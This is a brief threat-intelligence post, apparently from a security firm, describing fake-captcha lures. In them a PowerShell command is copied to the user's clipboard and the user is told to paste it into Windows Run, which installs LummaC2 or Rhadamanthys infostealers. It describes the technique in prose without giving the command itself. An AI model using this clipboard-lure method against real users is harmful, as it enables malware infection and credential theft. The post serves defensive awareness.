Recent months have seen the widespread use of an emerging technique, which exploits captcha fraudulent to deceive users and induce them to perform actions that would lead to malware infections.
Captcha, traditionally used to distinguish bots from humans, are being manipulated to convey malicious commands.
When the user interacts with the compromised captcha, a command PowerShell malicious command is automatically copied to the clipboard. Immediately afterwards, a pop-up instructs the user to use the key combination to open the Windows 'Run' utility, paste the copied command and press 'Enter'. This sequence leads to the execution of a command that downloads and executes malware from a remote server.
The distributed payload includes malware such as LummaC2 and Rhadamanthysknown for their advanced capabilities to steal information, such as login credentials or sensitive data. The malware is equipped with a callback mechanism that notifies the threat actor in the event of a successful infection, allowing it to obtain information of the infected user, such as IP address and location.
This technique, which uses social engineering to manipulate users, has high potential in campaigns of phishing o malvertisinggiven its ability to disguise itself behind an appearance that is legitimate and familiar to users.
If you wish to learn more, here is the link to our full report.
In addition, you can subscribe to the specific mailing list Cyber Studios by Tinexta Defence, to receive updates on upcoming research: https://tinextadefence.it/mailing-list-cyber-studios/
